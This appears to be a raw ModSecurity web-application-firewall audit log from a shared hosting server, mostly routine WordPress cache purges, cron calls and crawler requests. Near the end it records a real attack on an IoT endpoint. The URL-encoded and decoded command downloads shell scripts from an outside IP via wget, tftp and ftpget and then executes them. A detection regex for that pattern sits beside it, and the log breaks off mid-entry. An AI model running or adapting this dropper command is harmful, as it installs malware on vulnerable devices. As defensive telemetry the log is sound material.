deflate, gzip Connection: close --2c89be22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2c89be22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258662557940 1397452 (- - -) Stopwatch2: 1751258662557940 1397452; combined=2657, p1=134, p2=2320, p3=0, p4=0, p5=203, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2c89be22-Z-- --5213693d-A-- [30/Jun/2025:10:14:24.172136 +0530] aGIWKBzeZOcGeFSOIv5wMQAAACk 43.156.109.53 41218 192.168.74.40 80 --5213693d-B-- GET / HTTP/1.1 Host: hifaireapparels.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --5213693d-F-- HTTP/1.1 200 OK Content-Length: 447 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258940531842 940724 (- - -) Stopwatch2: 1751258940531842 940724; combined=3897, p1=116, p2=3406, p3=137, p4=3, p5=234, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b02b462c-Z-- --95c52d36-A-- [30/Jun/2025:10:19:03.797532 +0530] aGIXPlQIGeYbKHDkIDvuhgAAACU 103.185.74.40 41966 192.168.74.40 443 --95c52d36-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --95c52d36-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --95c52d36-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258942594956 1202850 (- - -) Stopwatch2: 1751258942594956 1202850; combined=2983, p1=97, p2=2726, p3=0, p4=0, p5=160, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --95c52d36-Z-- --b65e6e78-A-- [30/Jun/2025:10:19:03.850818 +0530] aGIXPwquW-ZG6If59R0EDgAAAC0 20.171.207.232 55972 192.168.74.40 443 --b65e6e78-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/shipping.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b65e6e78-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258943835274 15848 (- - -) Stopwatch2: 1751258943835274 15848; combined=2811, p1=186, p2=2483, p3=0, p4=0, p5=141, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b65e6e78-Z-- --0a8ee218-A-- [30/Jun/2025:10:19:05.105640 +0530] aGIXQHUmsl6F7MklQAIIcgAAAAU 103.185.74.40 3786 192.168.74.40 443 --0a8ee218-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --0a8ee218-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0a8ee218-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258944012783 1093560 (- - -) Stopwatch2: 1751258944012783 1093560; combined=4159, p1=269, p2=3728, p3=0, p4=0, p5=162, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0a8ee218-Z-- --bee8e121-A-- [30/Jun/2025:10:19:06.230681 +0530] aGIXQgquW-ZG6If59R0EEAAAAC0 20.171.207.232 55972 192.168.74.40 443 --bee8e121-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --bee8e121-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258948621573 16482 (- - -) Stopwatch2: 1751258948621573 16482; combined=3110, p1=117, p2=2832, p3=0, p4=0, p5=161, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --10397327-Z-- --6cfba47d-A-- [30/Jun/2025:10:19:09.888094 +0530] aGIXRNe07vLCpF4qxaCfEgAAAAw 103.185.74.40 3811 192.168.74.40 443 --6cfba47d-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6cfba47d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6cfba47d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258948752734 1135914 (- - -) Stopwatch2: 1751258948752734 1135914; combined=2488, p1=82, p2=2243, p3=0, p4=0, p5=163, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6cfba47d-Z-- --f6e4c226-A-- [30/Jun/2025:10:19:11.023576 +0530] aGIXRwquW-ZG6If59R0EFAAAAC0 20.171.207.232 55972 192.168.74.40 443 --f6e4c226-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f6e4c226-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258951004530 19494 (- - -) Stopwatch2: 1751258951004530 19494; combined=4237, p1=148, p2=3917, p3=0, p4=0, p5=172, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f6e4c226-Z-- --e626fb5a-A-- [30/Jun/2025:10:19:11.266650 +0530] aGIXRobAthmJ1wCkTQSjDwAAAAE 103.185.74.40 18329 192.168.74.40 443 --e626fb5a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --e626fb5a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e626fb5a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258950100434 1166702 (- - -) Stopwatch2: 1751258950100434 1166702; combined=3147, p1=95, p2=2873, p3=0, p4=0, p5=179, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e626fb5a-Z-- --5d20782a-A-- [30/Jun/2025:10:19:12.159292 +0530] aGIXSAquW-ZG6If59R0EFQAAAC0 20.171.207.232 55972 192.168.74.40 443 --5d20782a-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/aainag/https/images/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5d20782a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751259429539165 1478633 (- - -) Stopwatch2: 1751259429539165 1478633; combined=2687, p1=92, p2=2209, p3=139, p4=4, p5=242, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --32022717-Z-- --86996616-A-- [30/Jun/2025:10:27:13.807200 +0530] aGIZKW6zbUVoR8to75EZmgAAAA0 103.185.74.40 34605 192.168.74.40 443 --86996616-B-- POST /wp-cron.php?doing_wp_cron=1751259433.5753750801086425781250 HTTP/1.1 Host: kpowers.co.in User-Agent: WordPress/6.8.1; https://kpowers.co.in Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --86996616-C-- --86996616-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --86996616-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=5542, p1=159, p2=5056, p3=320, p4=7, p5=0, sr=58, sw=0, l=0, gc=0||Py scan:9689||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751259433787946 19683 (- - -) Stopwatch2: 1751259433787946 19683; combined=5951, p1=159, p2=5056, p3=320, p4=7, p5=409, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --86996616-Z-- --a172a94f-A-- [30/Jun/2025:10:27:16.167408 +0530] aGIZKN90v-k5czmpYtkNKgAAACo 43.157.180.116 55980 192.168.74.40 443 --a172a94f-B-- GET / HTTP/1.1 Host: kpowers.co.in User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Referer: http://kpowers.co.in Upgrade-Insecure-Requests: 1 --a172a94f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262260662696 17689 (- - -) Stopwatch2: 1751262260662696 17689; combined=3665, p1=124, p2=3360, p3=0, p4=0, p5=181, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c592f836-Z-- --09238c26-A-- [30/Jun/2025:11:14:20.854338 +0530] aGIkM5cyE7o0P9SeX0Cq4AAAADA 103.185.74.40 33203 192.168.74.40 443 --09238c26-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --09238c26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --09238c26-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262259449635 1404986 (- - -) Stopwatch2: 1751262259449635 1404986; combined=3413, p1=100, p2=3100, p3=0, p4=0, p5=213, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09238c26-Z-- --305e101b-A-- [30/Jun/2025:11:14:21.838287 +0530] aGIkNaUVl7utXwWpYKL-ygAAAGE 20.171.207.232 43372 192.168.74.40 443 --305e101b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/aainag/images/js/aainag/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --305e101b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --305e101b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262261822678 15916 (- - -) Stopwatch2: 1751262261822678 15916; combined=2834, p1=132, p2=2566, p3=0, p4=0, p5=136, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --305e101b-Z-- --8a88a228-A-- [30/Jun/2025:11:14:22.517612 +0530] aGIkNZ83UxAyrLHNqGZBVgAAAAc 103.185.74.40 10313 192.168.74.40 443 --8a88a228-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8a88a228-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a88a228-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262261064356 1453368 (- - -) Stopwatch2: 1751262261064356 1453368; combined=2394, p1=129, p2=2084, p3=0, p4=0, p5=180, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8a88a228-Z-- --06196678-A-- [30/Jun/2025:11:14:22.906898 +0530] aGIkNiq3IWCbc46XH1SCYAAAAFQ 20.171.207.114 51248 192.168.74.40 443 --06196678-B-- GET /returns_refunds.php/admin@oz/sweetalert-master/dist/js/images/admin@oz/sweetalert-master/dist/images/images/js/admin@oz/sweetalert-master/dist/js/blog.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=0cdd9q4miavt74qictli9mjgo0 host: ozautomotives.com.au --06196678-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264463509299 17511 (- - -) Stopwatch2: 1751264463509299 17511; combined=3681, p1=129, p2=3386, p3=0, p4=0, p5=166, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b4a1b01e-Z-- --cb93a054-A-- [30/Jun/2025:11:51:03.735361 +0530] aGIszpnKb72L72THikfB3wAAAD8 103.185.74.40 63493 192.168.74.40 443 --cb93a054-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cb93a054-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cb93a054-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264462033721 1703076 (- - -) Stopwatch2: 1751264462033721 1703076; combined=3631, p1=118, p2=3251, p3=0, p4=0, p5=262, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cb93a054-Z-- --df47c320-A-- [30/Jun/2025:11:51:03.895844 +0530] aGIsz84IF6ZvuwO8SwkX4gAAACY 170.245.31.227 35696 192.168.74.40 443 --df47c320-B-- POST /contact-incrementertech HTTP/1.1 Host: www.INCREMENTERTECH.COM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Transfer-Encoding: chunked Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264464774002 18117 (- - -) Stopwatch2: 1751264464774002 18117; combined=4027, p1=175, p2=3706, p3=0, p4=0, p5=146, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84a6d835-Z-- --ca8f4164-A-- [30/Jun/2025:11:51:05.148133 +0530] aGIszyvjmj29RdH0MDN1GwAAADE 103.185.74.40 61453 192.168.74.40 443 --ca8f4164-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ca8f4164-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ca8f4164-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264463949060 1199804 (- - -) Stopwatch2: 1751264463949060 1199804; combined=2591, p1=92, p2=2324, p3=0, p4=0, p5=174, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ca8f4164-Z-- --0db85f02-A-- [30/Jun/2025:11:51:05.998228 +0530] aGIs0Sw0PB_sNO9OrVxz7QAAAAY 20.171.207.232 47916 192.168.74.40 443 --0db85f02-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/about-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0db85f02-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bd9a5b61-Z-- --d91d7211-A-- [30/Jun/2025:11:51:15.288250 +0530] aGIs2-QzqxvzwdgFZ0PHsQAAADo 64.130.33.147 54164 192.168.74.40 80 --d91d7211-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F207.167.64.24%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%20207.167.64.24%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%20207.167.64.24%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20207.167.64.24%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1 Host: 103.185.74.40:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozila/5.0 Cookie: uid=1 --d91d7211-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --d91d7211-H-- Message: Match of "pm /wp-cron.php /wp-login.php /contact /index.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "275"] [id "77316859"] [msg "IM360 WAF: HTTP/1.1 POST request missing Content-Length Header||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/device.rsp||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match ";[\\s\\+]?wget\\shttps?:\\/\\/([^\\s\\+])" at ARGS:mdc. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "211"] [id "77142262"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||RSV:7.05||RS:0||T:APACHE||MVN:ARGS:mdc||MV:cd /tmp; wget http://207.167.64.24/tbk.sh; chmod 777 tbk.sh; sh tbk.sh; tftp 207.167.64.24 -c get tbk1.sh; chmod 777 tbk1.sh; sh tbk1.sh; tftp -r tbk2.sh -g 207.167.64.24; chmod 777 tbk2.sh; sh tbk2.sh; ftpget -v -u 